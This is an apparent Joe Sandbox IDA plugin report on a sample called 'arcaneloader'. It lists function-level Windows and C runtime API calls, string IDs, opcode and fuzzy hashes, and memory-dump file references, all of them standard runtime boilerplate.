                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                          • String ID: csm
                                                                          • API String ID: 1170836740-1018135373
                                                                          • Opcode ID: c502f363746e5750f7eb2209ed38b7527fc22a2c59c58d55f767665b3e1a25b2
                                                                          • Instruction ID: baa34977bbfe2d982483de8172dc7703e90a541556c951a917bec9650e2c831f
                                                                          • Opcode Fuzzy Hash: c502f363746e5750f7eb2209ed38b7527fc22a2c59c58d55f767665b3e1a25b2
                                                                          • Instruction Fuzzy Hash: 80418334A0021AEBCF10DF69C855F9EBBA5EF45314F18815EE815AB352D731EA05CBB1
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(00000000,?,00DC9EE2,00DC41E0,?,00000000,?,?,?,00DC9BEB,00000022,FlsSetValue,00DD3DDC,00DD3DE4,?), ref: 00DC9E94
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3664257935-537541572
                                                                          • Opcode ID: 76bd9407f615945589e143c9ca54b6fb1cf5785a4e197797f77447020ec6eed8
                                                                          • Instruction ID: e92e271d86a851d32c14faefc482c576d6b363f78c8943a99b47b3da718d3776
                                                                          • Opcode Fuzzy Hash: 76bd9407f615945589e143c9ca54b6fb1cf5785a4e197797f77447020ec6eed8
                                                                          • Instruction Fuzzy Hash: 50219231A02312ABC72197649C59F5AB75CAB61770F29011AF916E7391D730ED01C6F0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: e53ba378cf4501d60d7f6df5fa07752cf93375b6480f3f57448ed8cc696b4317
                                                                          • Instruction ID: 6c15bbe4f77dee12c876aff72d5def21af337261fdd95e1f323b9c2f6c06063e
                                                                          • Opcode Fuzzy Hash: e53ba378cf4501d60d7f6df5fa07752cf93375b6480f3f57448ed8cc696b4317
                                                                          • Instruction Fuzzy Hash: 557113B4A05209DFCB04DFACD9586EEBBF0FB48700F10852AE896AB350D77599458F62
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00DC8831,00DC5F0D,00DC55A4), ref: 00DC8848
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DC8856
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DC886F
                                                                          • SetLastError.KERNEL32(00000000,00DC8831,00DC5F0D,00DC55A4), ref: 00DC88C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: f582f3fda17fd5c0f1adf161b3d00b7dc5ef9538b3681158dc68973fb16409e6
                                                                          • Instruction ID: bc0198a69c519071418abe71625078cd804847c60c5700ee0cac2fb97840f8a6
                                                                          • Opcode Fuzzy Hash: f582f3fda17fd5c0f1adf161b3d00b7dc5ef9538b3681158dc68973fb16409e6
                                                                          • Instruction Fuzzy Hash: 3501B53211A3139DEA242AB4BC86F6A2765EF517B4365023FF010C76E1EF218C017274
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00DD25EB,000000FF,?,00DC7015,?,?,00DC70B1,00000000), ref: 00DC6F89
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DC6F9B
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00DD25EB,000000FF,?,00DC7015,?,?,00DC70B1,00000000), ref: 00DC6FBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 8df06f3380ac59d06792f2e3e6700fab88e73b3a3510d5b24325358cd0fc221f
                                                                          • Instruction ID: 03d4b4e5e3459ac4a1a583b1ffa2130faace4379d8f4b37952234c9616b1549f
                                                                          • Opcode Fuzzy Hash: 8df06f3380ac59d06792f2e3e6700fab88e73b3a3510d5b24325358cd0fc221f
                                                                          • Instruction Fuzzy Hash: 00016231944719AFDB119F50DC09FAEBBB8FF44B25F04052AE811E2790DBB5D904CAB4
                                                                          APIs
                                                                          • __alloca_probe_16.LIBCMT ref: 00DCDFA2
                                                                          • __alloca_probe_16.LIBCMT ref: 00DCE06B
                                                                          • __freea.LIBCMT ref: 00DCE0D2
                                                                            • Part of subcall function 00DCBC45: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DC41E0,?,?,00DC1007,?,00DBFAB5), ref: 00DCBC77
                                                                          • __freea.LIBCMT ref: 00DCE0E5
                                                                          • __freea.LIBCMT ref: 00DCE0F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 1096550386-0
                                                                          • Opcode ID: 2c1bedd929ccf2bdfce0704a1c4087ca7cc292ce52d6f04f017c76bbe6b23289
                                                                          • Instruction ID: 26dc8e53a790a4cd911ca5249fce85a9d196047c87eceadac8337b2fd4e7b2ae
                                                                          • Opcode Fuzzy Hash: 2c1bedd929ccf2bdfce0704a1c4087ca7cc292ce52d6f04f017c76bbe6b23289
                                                                          • Instruction Fuzzy Hash: FB518DB2600257ABEB215E60CC82FBB7BAAEF44750B19452EF945D7141EBB1CC50E6B0
                                                                          APIs
                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00DC93FE,?,?,00000000,00000000,00000000,?), ref: 00DC951D
                                                                          • CatchIt.LIBVCRUNTIME ref: 00DC9603
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CatchEncodePointer
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 1435073870-2084237596
                                                                          • Opcode ID: ef993e3b6143829f664b0eadcc4ad17e4918941c14c5a857637eecb17c035a1a
                                                                          • Instruction ID: 020b0d047f95a929d8fc9fab7d67e6e9f3cfbaf46c5fa7d9a943ab3dad85a5b9
                                                                          • Opcode Fuzzy Hash: ef993e3b6143829f664b0eadcc4ad17e4918941c14c5a857637eecb17c035a1a
                                                                          • Instruction Fuzzy Hash: 4241367190020AAFCF16DF98C995EEEBBB5EF48304F188099F905A7261D735A950DB60
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DCDCFA,00000000,?,00DDCCD0,?,?,?,00DCDC31,00000004,InitializeCriticalSectionEx,00DD46F8,00DD4700), ref: 00DCDC6B
                                                                          • GetLastError.KERNEL32(?,00DCDCFA,00000000,?,00DDCCD0,?,?,?,00DCDC31,00000004,InitializeCriticalSectionEx,00DD46F8,00DD4700,00000000,?,00DC971C), ref: 00DCDC75
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DCDC9D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID: api-ms-
                                                                          • API String ID: 3177248105-2084034818
                                                                          • Opcode ID: 97581165e011446ee7df1e938ecc64b6adf033d89482b29bf4bffa3f1d2e1911
                                                                          • Instruction ID: 539e145d37cd73976ff6286b6199b0647ab5247c385f4350095ee8af228ff6dc
                                                                          • Opcode Fuzzy Hash: 97581165e011446ee7df1e938ecc64b6adf033d89482b29bf4bffa3f1d2e1911
                                                                          • Instruction Fuzzy Hash: FAE04830640306BFEF202B61DD06F593B5AAB00B54F244035F90DE91E1EBB3E811D578
                                                                          APIs
                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00DCE64B
                                                                            • Part of subcall function 00DCD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00DC87B1,?,00000000,?), ref: 00DCD192
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DCE89D
                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DCE8E3
                                                                          • GetLastError.KERNEL32 ref: 00DCE986
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                          • String ID:
                                                                          • API String ID: 2112829910-0
                                                                          • Opcode ID: e5c504167f041f601f89215a36938543a9398bfe227707c1db623df7fad8db38
                                                                          • Instruction ID: 37034e598b144b05a9351c81658befe744e85b4a909ab2c9c97424389b73f3f9
                                                                          • Opcode Fuzzy Hash: e5c504167f041f601f89215a36938543a9398bfe227707c1db623df7fad8db38
                                                                          • Instruction Fuzzy Hash: 49D16AB5D0025A9FCB15CFA8C890AADBBB5FF09314F28452EE456EB351D630A942CF60
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer
                                                                          • String ID:
                                                                          • API String ID: 1740715915-0
                                                                          • Opcode ID: 6677de2bac84ea8cacb37053476c188abd695f2353a5cc1b37f028841f14822d
                                                                          • Instruction ID: c08e5173d081f92745898ffdeb569455aa9c87041f1080513b757ffe2d86e089
                                                                          • Opcode Fuzzy Hash: 6677de2bac84ea8cacb37053476c188abd695f2353a5cc1b37f028841f14822d
                                                                          • Instruction Fuzzy Hash: 7A510372605607AFEB298F54D855FBAB3A5FF40300F18012DE9458B291EB31EC80EBB0
                                                                          APIs
                                                                            • Part of subcall function 00DCD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00DC87B1,?,00000000,?), ref: 00DCD192
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00DCC95E,?,?,?,00000000), ref: 00DCC61C
                                                                          • __dosmaperr.LIBCMT ref: 00DCC623
                                                                          • GetLastError.KERNEL32(00000000,00DCC95E,?,?,00000000,?,?,?,00000000,00000000,?,00DCC95E,?,?,?,00000000), ref: 00DCC65D
                                                                          • __dosmaperr.LIBCMT ref: 00DCC664
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1913693674-0
                                                                          • Opcode ID: b7f0651f1b6aea17df619c441015f676bd261bc9d3d30e8f0c57d26f7bfba751
                                                                          • Instruction ID: 79057b10d5cc6b9d47d8f3985c3534dff67bd3f1d49d57fb52b2e768cd64aa7f
                                                                          • Opcode Fuzzy Hash: b7f0651f1b6aea17df619c441015f676bd261bc9d3d30e8f0c57d26f7bfba751
                                                                          • Instruction Fuzzy Hash: 8021C171250307AF8B10AF618981F2AB7A8EF45364714A41DFA5DD3161D730EC418BB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f55578251bd57c0674679200173d828499dec0ef773357c91388d9dfb305951e
                                                                          • Instruction ID: b8b64b6b8165deddbca5941780c5d62e5d308860d8b367aa7ed0bd5b45a1935f
                                                                          • Opcode Fuzzy Hash: f55578251bd57c0674679200173d828499dec0ef773357c91388d9dfb305951e
                                                                          • Instruction Fuzzy Hash: EE21C271210207AFCB20AFA5CD82F2A77A9EF403A4704551DFA1CD7151D730EC419BB0
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00DCD235
                                                                            • Part of subcall function 00DCD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00DC87B1,?,00000000,?), ref: 00DCD192
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DCD26D
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DCD28D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 158306478-0
                                                                          • Opcode ID: 68134f9757f404dcabdaf9d8e0d84a23446447694307351af22b3919cb8eddd1
                                                                          • Instruction ID: 711c78ee95212e3357f446c634a5138c4a18b43789fe0627891e7d37245a02cd
                                                                          • Opcode Fuzzy Hash: 68134f9757f404dcabdaf9d8e0d84a23446447694307351af22b3919cb8eddd1
                                                                          • Instruction Fuzzy Hash: 1311DBF160161B7E6B1127B19C8AE7FFA5DDE853A4714003EF802D3142FB60CD025579
                                                                          APIs
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00DCFF31,00000000,00000001,00000000,?,?,00DCE9DA,?,00000000,00000000), ref: 00DD07D7
                                                                          • GetLastError.KERNEL32(?,00DCFF31,00000000,00000001,00000000,?,?,00DCE9DA,?,00000000,00000000,?,?,?,00DCE320,00000000), ref: 00DD07E3
                                                                            • Part of subcall function 00DD0840: CloseHandle.KERNEL32(FFFFFFFE,00DD07F3,?,00DCFF31,00000000,00000001,00000000,?,?,00DCE9DA,?,00000000,00000000,?,?), ref: 00DD0850
                                                                          • ___initconout.LIBCMT ref: 00DD07F3
                                                                            • Part of subcall function 00DD0815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DD07B1,00DCFF1E,?,?,00DCE9DA,?,00000000,00000000,?), ref: 00DD0828
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00DCFF31,00000000,00000001,00000000,?,?,00DCE9DA,?,00000000,00000000,?), ref: 00DD0808
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                          • String ID:
                                                                          • API String ID: 2744216297-0
                                                                          • Opcode ID: 9ff3f316b3c75579c1ea3984fce911a635f8e057f1265b1cb03af52e05fc8696
                                                                          • Instruction ID: ecfe8ec6e32544ad678ebe577ac54dacebe8b71850c013c0a54d27bab4335dde
                                                                          • Opcode Fuzzy Hash: 9ff3f316b3c75579c1ea3984fce911a635f8e057f1265b1cb03af52e05fc8696
                                                                          • Instruction Fuzzy Hash: 36F0FE36001658BBCF222F91DC04A897F2AFF48361F058413FA1885221C6728820ABB1
                                                                          APIs
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00DC8D75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ___except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3493665558-3733052814
                                                                          • Opcode ID: 0f9ffa1bd6b0708ec7e4353c37ada42874482dc784854197947462106587b8ee
                                                                          • Instruction ID: 676b56211a7c009ff9a50c3a765d87f9a73a40f95d696d97c4cd47c575a42ec1
                                                                          • Opcode Fuzzy Hash: 0f9ffa1bd6b0708ec7e4353c37ada42874482dc784854197947462106587b8ee
                                                                          • Instruction Fuzzy Hash: F331D27640025AEFCF225F94C804EAA7B6AFF08324B18455EF8455B121CB33DD61FBA1